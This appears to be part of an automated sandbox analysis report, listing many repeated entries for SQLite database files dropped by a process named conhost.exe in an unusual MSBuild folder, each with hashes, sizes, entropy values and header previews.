                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
